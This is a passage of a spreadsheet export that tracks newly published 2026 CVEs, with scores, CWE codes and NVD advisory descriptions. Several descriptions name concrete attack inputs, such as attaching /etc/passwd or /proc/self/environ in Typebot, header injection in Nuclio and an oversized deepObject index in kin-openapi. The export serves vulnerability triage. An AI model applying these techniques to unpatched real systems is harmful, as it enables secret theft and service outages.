          <t>Typebot is an open-source chatbot builder. In self-hosted versions prior to 3.18.0, the server-side Send Email integration block allows arbitrary reading of local files on the server. The block builds Nodemailer attachments from a typebot variable, and its parseAttachments helper returns the supplied value as a filesystem path whenever it does not start with the application's own base URL, instead of requiring an http or https URL. The Nodemailer transport is created without disableFileAccess or disableUrlAccess, both of which default to false, so an attachment specified as an absolute server path is read from the local filesystem and delivered. Because both the attachment value and the recipient list are attacker-controllable typebot variables, any registered user can publish a bot whose Send Email block attaches an absolute path such as /etc/passwd or /proc/self/environ and mails it to an address they control. This enables reading any file the server process can access, including process environment secrets such as the credential encryption key and database connection string, without administrative privileges or victim interaction. Open signup is enabled by default and the system SMTP credential is already configured, so no non-default configuration is required. This issue is fixed in version 3.18.0.</t>
        </is>
      </c>
      <c r="S242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62865</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63383</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent can read beyond a contiguous evbuffer region in event_tagging.c when decode_tag_internal requests at most five bytes from evbuffer_pullup but iterates using the full logical buffer length. A fragmented evbuffer containing a six-byte malformed tag can therefore advance past the pullup window and trigger an out-of-bounds read, which can crash a process that decodes attacker-controlled tagged RPC data. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63383</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63384</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has an incorrect integer conversion in event_tagging.c when evtag_unmarshal_header uses evtag_decode_int to decode an attacker-controlled uint32 payload length and returns it as a signed int. Values above INT_MAX become negative or truncated, and evtag_unmarshal_string can use the converted value in allocation sizing, producing a wrapped large allocation request and denial of service. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63384</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63403</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the server is vulnerable to an unauthenticated denial of service in which a single malformed command crashes the entire process. Its wire protocol is line-based, and several command handlers slice or index the received line at a fixed offset, such as cmd[5:] for PUSH or qs[0] for QUEUE, without checking that a payload is present. Sending a bare verb with no payload, for example PUSH, ACK, FAIL, BEAT, PUSHB, or QUEUE, triggers a Go slice or index out-of-range panic. Because the codebase has no recover() anywhere in the command-dispatch path, an unrecovered panic in a handler goroutine terminates the whole Go process rather than just that connection, instantly disconnecting every other client, worker, and in-flight job. The attack requires only a connection to the command port and completion of the trivial handshake, with no credentials when no password is configured, and can be repeated to keep the service down indefinitely. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="S245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63403</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77120</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@se.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause privilege escalation to root and unauthorized execution of administrative functions when an authenticated user with SSH enabled interacts with the operating system console that improperly processes user-controlled input.</t>
        </is>
      </c>
      <c r="S246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77120</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77298</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions 4.39 and earlier, the S3 API accepts an external OIDC JWT sent directly in the Authorization header and maps it to an IAM role without enforcing that role's trust policy, so a federated user can assume a role they are not permitted to hold. The standard STS AssumeRoleWithWebIdentity path rejects such a token when the role's trust policy does not trust the token's federated provider, but the direct S3 bearer path validates only the token itself and then authenticates as the mapped role and evaluates that role's attached S3 permissions. As a result, a valid OIDC user whose token would be denied the role through STS can obtain the role's S3 access, including object read, write, and delete, by presenting the raw OIDC JWT directly to the S3 API. This issue is fixed in version 4.40</t>
        </is>
      </c>
      <c r="S247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77298</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77354</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-789</t>
        </is>
      </c>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>kin-openapi is a Go project for handling OpenAPI files. From 0.124.0 until 0.142.0, openapi3filter.sliceMapToSlice in openapi3filter/req_resp_decoder.go converts attacker-controlled sparse indexes from a deepObject query parameter into a dense slice by allocating entries from zero through the largest supplied index, after which buildResObj creates another slice of the same length. This allocation occurs before schema validation, so maxItems does not prevent it. An unauthenticated client can send a small query such as param[items][50000000]=x to an endpoint whose deepObject schema contains an array, forcing multi-gigabyte heap allocation and causing an OOM kill or restart loop. Other request-body encodings and styled parameters that do not produce bracketed integer indexes are not affected. This issue is fixed in version 0.142.0.</t>
        </is>
      </c>
      <c r="S248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77354</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77357</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-834</t>
        </is>
      </c>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>Mesop is a Python-based UI framework that allows users to build web applications. Prior to 1.3.3, applications running in debug mode expose a GET /hot-reload endpoint whose unbounded loop depends on the user-supplied counter parameter, allowing an unauthenticated attacker to hold worker threads with high counter values until the worker pool is exhausted and the server becomes unavailable. A single unauthenticated attacker can crash the Mesop server with minimal effort. Because the attack leverages worker exhaustion, the server remains unresponsive until it is manually restarted. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="S249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77357</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79756</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.051</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, the fix for unauthenticated OS command injection in the nuclio dashboard on the local/Docker platform is incomplete. The fix added validateFunctionName for function names and common.Quote() for the named-resource shell command path, but the list-all resource path (triggered when no specific resource name is provided) still interpolates the resourceNamespace parameter unquoted into a /bin/sh -c command string. An unauthenticated attacker can inject shell metacharacters via the X-Nuclio-Function-Namespace, X-Nuclio-Project-Namespace, or X-Nuclio-Function-Event-Namespace HTTP headers to achieve arbitrary command execution inside the dashboard container. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="S250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79756</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79989</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>7004884b-51e2-48e8-b4a2-5ca29e80453e</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>The vulnerability allows any authenticated user to change their own password without providing the current password or having an active elevated session. It also allows the attacker to change other users’ passwords if the attacker’s account has Edit users permission (which doesn’t allow changing others’ passwords) and lacks Administrate users permission (which is required to change others’ passwords).</t>
        </is>
      </c>
      <c r="S251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79989</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81640</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>An attacker could derive the camera's Wi-Fi password and connect to its wireless network. This weakens or eliminates the security value of the access-point password and may expose the live video stream, device services, status interfaces, and firmware-update functionality.</t>
        </is>
      </c>
      <c r="S252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81640</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84304</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr"/>
      <c r="Q253" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>gRPC-Go is</t>
        </is>
      </c>
      <c r="S253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84304</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86199</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.43.1 fail to properly validate the Certificate field during offline login authentication. Unauthenticated players can trigger an uninitialized property access error that crashes the server.</t>
        </is>
      </c>
      <c r="S254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86199</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86201</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.41.1 contains a denial of service vulnerability in LoginPacket processing where large or complex structures in unknown clientData JWT properties cause excessive logging without sanitization. Attackers can send crafted LoginPackets with deeply nested or massive object structures to trigger out-of-memory conditions and crash the server.</t>
        </is>
      </c>
      <c r="S255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86201</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86428</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.10.0 contain a denial of service vulnerability in the AttributesExtension when processing distinctly-named attributes. Attackers can submit Markdown with numerous distinct attribute names to cause quadratic-time attribute merging and filtering, consuming disproportionate CPU resources and preventing legitimate requests from completing.</t>
        </is>
      </c>
      <c r="S256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86428</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86435</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.8.4 contain a denial of service vulnerability in the Footnote extension that fails to deduplicate footnote definitions. Attackers can craft documents with duplicate footnote definitions and references to create quadratic output expansion, consuming excessive memory and CPU to exhaust server resources.</t>
        </is>
      </c>
      <c r="S257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86435</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87807</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
